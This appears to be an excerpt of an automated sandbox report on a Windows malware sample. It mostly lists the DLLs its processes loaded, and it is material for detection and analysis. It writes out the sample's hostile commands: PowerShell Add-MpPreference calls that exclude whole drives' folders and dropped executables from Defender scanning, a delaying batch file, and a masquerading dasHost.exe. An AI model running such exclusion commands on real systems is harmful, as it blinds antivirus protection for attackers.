                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\ssh\AaHCyFZRuOMjGDqdgJ.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Documents\My Pictures\AaHCyFZRuOMjGDqdgJ.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6XMNLNVLzg.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe "C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe"
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
